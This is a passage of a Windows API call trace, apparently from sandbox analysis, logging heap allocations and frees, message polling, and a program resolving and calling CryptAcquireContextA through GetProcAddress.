HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4618 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab208 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab178 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1ff8 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4668 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab250 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1d8 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b46b8 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2028 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4690 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab0d0 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fd8 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaff8 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab160 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab118 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fe8 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafc8 | out: hHeap=0x25c0000) returned 1 [0145.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fc8 | out: hHeap=0x25c0000) returned 1 [0145.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab028 | out: hHeap=0x25c0000) returned 1 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab028 [0145.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0145.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.478] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0145.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafc8 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fc8 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4690 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab118 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fe8 [0145.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab118 | out: hHeap=0x25c0000) returned 1 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b46b8 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab118 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0145.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fd8 [0145.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fd8 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafc8 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fc8 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.479] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0145.479] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0145.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fa8 [0145.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fc8 [0145.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0145.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafc8 [0145.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fd8 [0145.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fd8 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafc8 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fc8 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0145.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab0e8 | out: hHeap=0x25c0000) returned 1 [0145.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab0e8 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0145.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafc8 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0145.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab160 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaff8 [0145.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0145.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1a8 | out: hHeap=0x25c0000) returned 1 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1a8 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab0d0 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1d8 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fa8 [0145.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab250 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab250 | out: hHeap=0x25c0000) returned 1 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1d8 | out: hHeap=0x25c0000) returned 1 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab0d0 | out: hHeap=0x25c0000) returned 1 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab0d0 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1d8 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab250 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab178 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab208 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fa8 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab100 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab100 | out: hHeap=0x25c0000) returned 1 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab208 | out: hHeap=0x25c0000) returned 1 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab178 | out: hHeap=0x25c0000) returned 1 [0145.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab178 [0145.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab208 [0145.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0145.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab100 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1c0 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fa8 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0145.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0145.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab268 | out: hHeap=0x25c0000) returned 1 [0145.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1c0 | out: hHeap=0x25c0000) returned 1 [0145.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1c0 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0145.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0145.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab220 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab280 [0145.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2f8 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0145.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1f28 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0145.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2e0 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fc8 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2c8 [0145.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2c8 | out: hHeap=0x25c0000) returned 1 [0145.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fc8 | out: hHeap=0x25c0000) returned 1 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2c8 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fc8 [0145.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2e0 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fd8 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab298 [0145.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab298 | out: hHeap=0x25c0000) returned 1 [0145.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fd8 | out: hHeap=0x25c0000) returned 1 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fd8 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab298 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2028 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2e0 [0145.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab298 | out: hHeap=0x25c0000) returned 1 [0145.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2028 | out: hHeap=0x25c0000) returned 1 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2028 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2e0 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1ff8 [0145.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab298 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab298 | out: hHeap=0x25c0000) returned 1 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1ff8 | out: hHeap=0x25c0000) returned 1 [0145.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1ff8 [0145.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab298 [0145.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0145.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2008 [0145.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2e0 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab298 | out: hHeap=0x25c0000) returned 1 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0145.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2c8 | out: hHeap=0x25c0000) returned 1 [0145.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2008 [0145.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2c8 [0145.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0145.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2048 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2c8 | out: hHeap=0x25c0000) returned 1 [0145.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0145.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0145.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.486] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0145.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4668 | out: hHeap=0x25c0000) returned 1 [0145.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0145.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0145.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2e0 | out: hHeap=0x25c0000) returned 1 [0145.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.486] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0145.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4668 | out: hHeap=0x25c0000) returned 1 [0145.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3810 | out: hHeap=0x25c0000) returned 1 [0145.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0145.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0145.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2038 | out: hHeap=0x25c0000) returned 1 [0145.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0145.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0145.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.487] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab298 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2c8 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab298 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: 